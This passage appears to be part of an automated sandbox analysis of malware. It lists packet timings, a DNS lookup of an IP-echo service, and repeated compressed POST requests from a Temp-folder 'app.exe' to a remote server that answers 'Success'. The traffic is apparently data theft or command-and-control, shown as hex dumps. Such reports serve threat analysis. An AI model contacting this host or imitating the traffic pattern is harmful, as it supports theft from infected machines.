                                                                                                                                            May 5, 2024 00:25:09.566930056 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.567094088 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.567266941 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.567347050 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.567468882 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.567482948 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.567593098 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.567606926 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.667402029 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.667440891 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.667455912 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.667469978 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.667999029 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668024063 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668040037 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668116093 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668245077 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668263912 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668279886 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668431997 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668467999 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668484926 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668499947 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668515921 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668531895 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668670893 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668694019 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668734074 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668751955 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668776035 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668792963 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.668808937 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.669043064 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.669065952 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.669291019 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.669313908 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.669342995 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.669539928 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.669686079 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.669719934 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.669925928 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.670160055 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.670233011 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.670249939 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.670412064 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.670433998 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.670663118 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.670685053 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.670717955 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.670908928 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.670993090 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.671015978 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.671031952 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.671047926 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.671140909 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.671159029 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.671175003 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.671192884 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.671217918 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.671415091 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.671437979 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.768264055 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.810328007 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:25:10.640578985 CEST4978980192.168.11.20144.208.127.230

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            May 5, 2024 00:24:47.800074100 CEST5476553192.168.11.201.1.1.1
                                                                                                                                            May 5, 2024 00:24:47.899873972 CEST53547651.1.1.1192.168.11.20

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            May 5, 2024 00:24:47.800074100 CEST192.168.11.201.1.1.10x3613Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            May 5, 2024 00:24:47.899873972 CEST1.1.1.1192.168.11.200x3613No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                            May 5, 2024 00:24:47.899873972 CEST1.1.1.1192.168.11.200x3613No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                            May 5, 2024 00:24:47.899873972 CEST1.1.1.1192.168.11.200x3613No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • api.ipify.org
                                                                                                                                            • 144.208.127.230

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.11.2049789144.208.127.230807132C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            May 5, 2024 00:24:50.216104031 CEST244OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 451
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.216152906 CEST451OUTData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 92 dd 6e e2 30 10 85 5f 65 e4 ab 56 2a 91 b3 d0 68 c3 d5 a6 b0 0a bb 2b b4 15 bb a8 37 96 22 13 0f 89 d5 60 47 b6 03 fd 51 df bd 76 02 54 a8 bd b3 3e 9f 33 33 67 ec 57 a2 f8 0e c9 94 ac ee 8a 87 98 26 93 82 8e c9
                                                                                                                                            Data Ascii: mn0_eV*h+7"`GQvT>33gW&q5{w{rnx=+bdqt%0Y4\3\CSS!-jmZ=*}P_Hb#$ATAFo)k,zA*bF0Q~.B$hFxq#
                                                                                                                                            May 5, 2024 00:24:50.450010061 CEST1289INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:50 GMT
                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                            Content-Length: 8305
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 53 75 63 63 65 73 73 22 2c 20 22 6b 22 3a 20 22 38 74 6e 65 6c 63 22 2c 20 22 63 22 3a 20 22 6b 61 4e 4a 77 65 70 73 52 5a 49 79 30 62 53 72 71 7a 55 37 44 4b 74 37 72 67 4e 49 4c 38 41 32 35 42 37 73 61 68 66 65 56 54 74 54 44 6e 65 6a 58 6f 32 63 31 74 4f 35 34 52 31 78 56 35 33 4b 2f 61 44 42 36 7a 32 2b 5a 32 4a 6e 70 50 62 41 43 55 41 64 4e 2f 35 44 65 42 59 76 39 6f 68 71 5a 30 64 4f 4c 2b 39 6f 2b 4a 61 58 7a 73 6a 68 6c 44 73 76 4e 79 6e 79 62 6e 42 33 47 52 52 51 37 35 46 44 6c 2f 6e 64 31 78 2b 70 78 55 66 47 6d 55 6c 51 39 79 76 30 72 48 39 4f 4c 67 78 68 4e 74 55 6f 41 33 32 54 6c 53 6b 4b 63 74 35 58 68 37 4f 51 35 69 56 30 78 51 52 6d 70 4b 52 63 4f 36 42 71 33 2f 71 6c 6d 4f 37 49 53 63 46 37 52 32 52 2b 59 5a 70 71 76 4b 42 55 4e 4d 45 4a 73 32 79 73 6c 6b 71 44 5a 78 75 39 6c 6e 50 62 57 2b 74 48 6b 4c 44 6d 6a 6a 67 72 78 5a 31 39 56 46 5a 4f 49 66 70 33 4c 75 39 34 69 4a 34 50 57 38 75 37 66 66 76 4d 76 6e 6e 71 73 59 56 50 2b 76 4e 70 67 59 67 [TRUNCATED]
                                                                                                                                            Data Ascii: {"status": "Success", "k": "8tnelc", "c": "kaNJwepsRZIy0bSrqzU7DKt7rgNIL8A25B7sahfeVTtTDnejXo2c1tO54R1xV53K/aDB6z2+Z2JnpPbACUAdN/5DeBYv9ohqZ0dOL+9o+JaXzsjhlDsvNynybnB3GRRQ75FDl/nd1x+pxUfGmUlQ9yv0rH9OLgxhNtUoA32TlSkKct5Xh7OQ5iV0xQRmpKRcO6Bq3/qlmO7IScF7R2R+YZpqvKBUNMEJs2yslkqDZxu9lnPbW+tHkLDmjjgrxZ19VFZOIfp3Lu94iJ4PW8u7ffvMvnnqsYVP+vNpgYg3lAmxfli1XbZzjIDRQyy5Lbl+uz0J5hJojeDip0XEg46YkH/Zr+tFfLhA/eAQCQad1XVzyTs+YQamHnJaEsQ72/+XztcXwCaBFu7dHlo0223GdLL2YXdPr8WxyzolPFGBWndMBbiCzvSmYnWgZg35iZdhEnJ12KJoYlkAmk9Mja5kG9BwkWDVHN9lso+bzJzzKrRHzT7RVg9wAAU/aeeopGCsTjBXlyUlhBm5u/6PkHOp4YMVOMt4oOwMU+OfKU+DvUaLp40YAZ9xoNPV9aePcxmV1V+Cu8JeCWWMqIvXvJ4zYI5k7iFV82jRtpfcfsPHi5l1rouoKPw6Odz8er65Qdos32cQVg+B24Chib7ZgEtCxhl2hLgLlc77GlSGm3HSTzWHnt5pZltMWP1n0pAhYTqA+m/Jba46kbBybPmiy3MYMrslWH+VQKUUTwE6By7O397vhGuimnZ2xS3+HUmP3sM89ICF/pz1AsEvZW1EU4nCtaz9ttGeH/2jg4ieVQxNLOiZ+o1i4YKbPXPjUTN9UpScmK+IQQ917mHWOgfRTKHx6bgREDv++5YhViKDXKvP22yhVM3vLYLAjlR2OgSVq8z0QiUajMd+pdWyANL8RfjXc7B5SYbgVzrAaBrvPhBx2xEQC
                                                                                                                                            May 5, 2024 00:24:50.450088978 CEST1289INData Raw: 62 6b 64 73 38 65 52 54 72 6a 58 4a 46 65 54 59 4e 6f 61 31 5a 51 37 6a 50 56 7a 54 53 32 38 5a 6f 49 53 4e 39 42 6c 49 66 6b 78 6f 30 64 62 7a 55 51 55 4e 72 36 48 56 67 71 38 54 64 44 75 76 49 4c 4c 57 35 78 33 4a 78 67 66 56 72 61 4b 4b 52 43
                                                                                                                                            Data Ascii: bkds8eRTrjXJFeTYNoa1ZQ7jPVzTS28ZoISN9BlIfkxo0dbzUQUNr6HVgq8TdDuvILLW5x3JxgfVraKKRCD1/Df/98Wh8K6F9wa2B/jbCbTf7/2OFTVGsVdFL15ujKD2e9YerOtL54nytmoFxqhswMBs4s6NNGxOnB8MEkHBwnSFUxslHcsDRG/zTUzdridHCr3trm76UPVVSbR9ATXQHtl/v2trn2PEr5n0TUPNkSnrxqnmpHM
                                                                                                                                            May 5, 2024 00:24:50.450146914 CEST1289INData Raw: 6f 48 73 74 4e 6b 68 52 35 76 62 58 63 58 5a 6d 6c 47 4f 54 7a 49 6d 63 30 79 67 71 49 6e 64 43 33 6c 4d 39 45 2f 62 77 70 4b 43 61 63 6b 41 34 4b 69 62 44 41 5a 55 45 47 74 35 41 54 34 75 38 67 66 38 55 33 30 75 71 45 59 6c 7a 4c 54 4b 78 49 2f
                                                                                                                                            Data Ascii: oHstNkhR5vbXcXZmlGOTzImc0ygqIndC3lM9E/bwpKCackA4KibDAZUEGt5AT4u8gf8U30uqEYlzLTKxI/PfykhqXQTJk4oMUVQ4EOW1nezzt+qXOPJTpMPai7SoKD+UYcfa6d/P+p68pDUe9GJM/MZjlZyXDec8815W32UMTugu6qHm/vUBh5CLpVPafGItqH4aImWLc2ETcy3ARdSemvoYXcaUWEQI+s1PB4yYhKtvg/G11My
                                                                                                                                            May 5, 2024 00:24:50.450248957 CEST1289INData Raw: 32 44 46 78 6f 55 30 45 50 64 35 6b 4c 5a 52 59 51 55 49 72 65 76 4d 58 76 57 30 77 76 54 39 38 67 2f 39 51 46 62 47 6d 77 49 6c 4f 55 71 4b 48 2f 44 45 6f 4a 63 36 61 6d 4b 50 76 38 53 35 62 6c 48 49 75 2f 4c 74 65 72 55 4b 2b 50 57 71 37 64 50
                                                                                                                                            Data Ascii: 2DFxoU0EPd5kLZRYQUIrevMXvW0wvT98g/9QFbGmwIlOUqKH/DEoJc6amKPv8S5blHIu/LterUK+PWq7dPQpGXGD5ZOih/Oi6qzzVxnOi6i/06tNmmkjALhjtQB9t/95owIzfKvEedp/aQFWBd24OnhgBDcfVEnPM6RIIp9tebTj8pZTc4YlihFFbui9mE9d9lrX9cNg+IHibtptNZDIWCaIi3mNdUBOJgMRFVnD9LT89WvI1/O
                                                                                                                                            May 5, 2024 00:24:50.450306892 CEST1289INData Raw: 74 52 64 73 41 61 46 38 66 57 68 39 70 4a 39 77 4b 46 71 31 39 7a 33 6a 74 2b 6a 7a 42 31 46 4d 39 63 32 57 64 57 30 67 45 56 52 75 4b 4f 33 68 4a 51 71 77 64 6e 69 76 43 36 50 50 4e 65 31 2f 44 5a 59 73 63 54 6c 62 4d 38 44 68 76 51 58 5a 2b 5a
                                                                                                                                            Data Ascii: tRdsAaF8fWh9pJ9wKFq19z3jt+jzB1FM9c2WdW0gEVRuKO3hJQqwdnivC6PPNe1/DZYscTlbM8DhvQXZ+ZBQNKYmvASFIzYPB8iu+r+i69xgEXhMLeu9xrJvgBVneYDBWm/y5aNZ/ZS03kmBNOPTYtONP4WJso7liWc/DdEABCTpNdFcVlsBQA90wobRCQMH9YiZUGAjcV6Q29fbL817+s+NbGFRz8UNH7ypGvXBmIIpSXkPBXv
                                                                                                                                            May 5, 2024 00:24:50.450361967 CEST1289INData Raw: 71 58 34 52 43 56 50 57 67 38 71 38 48 51 2b 32 61 6c 31 43 72 72 6f 4b 67 4b 5a 41 32 48 36 7a 58 6f 36 7a 34 64 4d 38 4e 68 55 4c 2f 74 42 2f 76 6f 2b 4e 51 63 4d 50 71 78 64 63 39 31 39 49 44 2b 41 42 53 53 77 62 6e 50 42 58 6d 4e 34 75 56 31
                                                                                                                                            Data Ascii: qX4RCVPWg8q8HQ+2al1CrroKgKZA2H6zXo6z4dM8NhUL/tB/vo+NQcMPqxdc919ID+ABSSwbnPBXmN4uV1qxppjK9sM2xlaSevYsUM6dFm8o9fRstZvkzbumT4xCaXinZDXqHjnDDOOue242WxapBtbHSobtSIl/+sF92XPefrP5XfcbJ+qhHbCUmNtgNaRe8NXLGwvUdd+rilgwyij3FQzKVsswtsbDyPNFxiMA6JNtN+zvj5r
                                                                                                                                            May 5, 2024 00:24:50.450412035 CEST876INData Raw: 52 59 32 33 6f 30 59 70 51 57 32 39 6e 6e 37 30 50 48 4e 45 65 69 4d 34 56 50 6c 7a 77 32 39 77 51 31 70 6b 4e 7a 52 31 51 33 4c 36 54 2b 63 62 64 75 52 48 69 41 2f 76 66 6d 51 68 53 31 64 30 70 50 71 30 6d 75 37 73 6d 48 54 48 32 75 4b 4d 56 49
                                                                                                                                            Data Ascii: RY23o0YpQW29nn70PHNEeiM4VPlzw29wQ1pkNzR1Q3L6T+cbduRHiA/vfmQhS1d0pPq0mu7smHTH2uKMVIMKls8A3sGqx4UvHRvk+qJ1cewl+gwjZdmpsW3mL6AGZBsxEUh+jrXmQBz2JUUWffl2zNmFoGOXNGdtwc9NG4qcXKYqD3radrzhKC2xSTeqac6zWjVeHesb8YktCCkYHLKQyLXsZUPuMIFxUxu7hgqYGh/TkKczaMB
                                                                                                                                            May 5, 2024 00:24:50.615658998 CEST244OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 996
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.615658998 CEST996OUTData Raw: 1f 8b 08 00 00 00 00 00 00 ff 4d 54 dd 8e e3 34 14 7e 97 b9 46 c8 16 14 a9 73 47 5a 3b ad 9b ba e3 63 9f e3 8e 55 09 65 c9 6a 83 6c d8 68 36 88 22 c4 bb f3 e5 8e bb c4 51 ce f9 7e fd cf cb 1f e3 ef 9f 5f 5e 5f a8 fb 25 6b f5 d3 8f bf a8 1f 5e be
                                                                                                                                            Data Ascii: MT4~FsGZ;cUejlh6"Q~_^_%k^{Y[vcx?[].Gbuw??}ANoMJQKC]GJzF_,{&vQ\eLm.V).&*QMB0AQ]J76H+>vB
                                                                                                                                            May 5, 2024 00:24:50.746968031 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:50 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:50.784807920 CEST245OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1008
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.784807920 CEST1008OUTData Raw: 1f 8b 08 00 00 00 00 00 00 ff 1d 94 51 8f 22 37 10 84 ff cb 3e 47 91 47 09 91 d8 b7 33 d8 03 06 86 75 db dd 06 0b e9 34 a7 39 dd 44 ee e4 46 bb 44 22 8a f2 df af b8 27 d0 d8 6e 77 57 7d e5 ff 5e fe 1e ff fa fa f2 fa 42 f6 73 e9 cc 1f bf 7f 36 bf
                                                                                                                                            Data Ascii: Q"7>GG3u49DFD"'nwW}^Bs6r/^_7|}>ovn}Ll//x7G>B_ON[:_DgCd=N9rLxgb6wnlt#naIfYmON-Ds
                                                                                                                                            May 5, 2024 00:24:50.913850069 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:50 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:50.960611105 CEST245OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1007
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.960611105 CEST1007OUTData Raw: 1f 8b 08 00 00 00 00 00 00 ff 25 94 51 af e3 34 10 85 ff cb 7d 46 c8 16 04 e9 ee 1b 69 ed a4 6e eb 5e 8f 3d e3 d4 aa b4 ca 2a cb 06 d9 b0 d1 dd 22 8a 10 ff 9d 53 78 a8 d4 26 f5 78 e6 cc 77 ce df 2f bf cf bf 7d 7e f9 f0 42 fd c7 ac d5 4f 3f 7e 54
                                                                                                                                            Data Ascii: %Q4}Fin^=*"Sx&xw/}~BO?~T?|rO|pnznCOlCtzuejeI\jMfb9Qs)j+b!Y:&+!69l9!3Je3K\RC%r
                                                                                                                                            May 5, 2024 00:24:51.089246988 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:51 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:51.138124943 CEST244OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 992
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.273591042 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:51 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:51.344860077 CEST245OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1004
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.474955082 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:51 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:51.581295013 CEST245OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1002
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.720448017 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:51 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:51.754550934 CEST245OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1005
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.886817932 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:51 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:51.993621111 CEST245OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1000
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.130491972 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:52 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:52.209886074 CEST244OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 999
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.350059032 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:52 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:52.440471888 CEST244OUTPOST / HTTP/1.1
